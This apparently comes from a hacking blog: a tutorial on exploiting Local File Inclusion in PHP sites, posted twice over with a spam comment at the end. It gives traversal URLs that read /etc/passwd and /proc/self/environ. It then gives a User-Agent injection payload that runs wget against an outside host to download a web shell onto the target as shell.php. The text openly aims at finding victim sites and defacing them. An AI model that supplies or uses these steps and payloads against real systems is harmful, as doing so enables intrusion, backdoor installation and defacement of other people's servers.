Hey awl in this tut i will be telling you all about LFI (Local File Inclusion) and also how to upload shell through it.
LFI ( Local File Inclusion ) Attacks are occur in the web application when the parameters are not checked properly and checked before being used to include the files. By this vulnerability flow Attacker can see the arbitrary files on the directory and even can deface the site by uploading the Shell by this over flow.
Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.
www.website.com/view.php?page=contact.php
Now lets replace contact.php with ../ so the URL will become
www.website.com/view.php?page=../
and we got an error
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
This shows that there may a vulnerability on our target site.
www.website.com/view.php?page=../../../etc/passwd
we got error and no etc/passwd file
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
so we go more directories up
www.website.com/view.php?page=../../../../../etc/passwd
we succesfully included the etc/passwd file and we go result something like this:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP
User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ
www.website.com/view.php?page=../../../../../proc/self/environ
If you get something like
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap,
*/*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80
proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.
Now let’s inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header
For that first of all download the User-Agent Switcher and Open it and click on new>New User-Agent or you can also use Tamperdata
After opening the New User Agent in User Agent replace that with
” <?php phpinfo();?> ” without quotes
And give the description whatever you like and click on Ok then refresh the page you will get the PHP info file open in the Tab.
Now again go to Agent users and replace the User Agent with <?exec(‘wget http://www.sh3ll.org/egy.txt -O shell.php’);?> and click ok.
( http://www.sh3ll.org/egy.txt you can put your remote shell link nad -O will convert the shell in shell.php )
Now we have successfully uploaded the shell in the site. You will get the shell link like this
www.website.com/shell.php
What Is LFI ?
LFI ( Local File Inclusion ) Attacks are occur in the web application when the parameters are not checked properly and checked before being used to include the files. By this vulnerability flow Attacker can see the arbitrary files on the directory and even can deface the site by uploading the Shell by this over flow.
Things Required
- LFI Vulnerable site
- User-Agent Switcher ( https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/ ) or u can also use tamperdata (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/)
- A remote shell
Finding LFI Vulnerable Site
Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.
www.website.com/view.php?page=contact.php
Now lets replace contact.php with ../ so the URL will become
www.website.com/view.php?page=../
and we got an error
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
This shows that there may a vulnerability on our target site.
Checking etc/passwd to check whether target is vulnerable or not
www.website.com/view.php?page=../../../etc/passwd
we got error and no etc/passwd file
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
so we go more directories up
www.website.com/view.php?page=../../../../../etc/passwd
we succesfully included the etc/passwd file and we go result something like this:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP
User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
Checking if proc/self/environ is accessible
Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ
www.website.com/view.php?page=../../../../../proc/self/environ
If you get something like
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap,
*/*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80
proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.
Injecting malicious code and Uploading Shell
Now let’s inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header
For that first of all download the User-Agent Switcher and Open it and click on new>New User-Agent or you can also use Tamperdata
After opening the New User Agent in User Agent replace that with
” <?php phpinfo();?> ” without quotes
And give the description whatever you like and click on Ok then refresh the page you will get the PHP info file open in the Tab.
Now again go to Agent users and replace the User Agent with <?exec(‘wget http://www.sh3ll.org/egy.txt -O shell.php’);?> and click ok.
( http://www.sh3ll.org/egy.txt you can put your remote shell link nad -O will convert the shell in shell.php )
Now we have successfully uploaded the shell in the site. You will get the shell link like this
www.website.com/shell.php
thats nice review http://www.cheers4all.com
ReplyDelete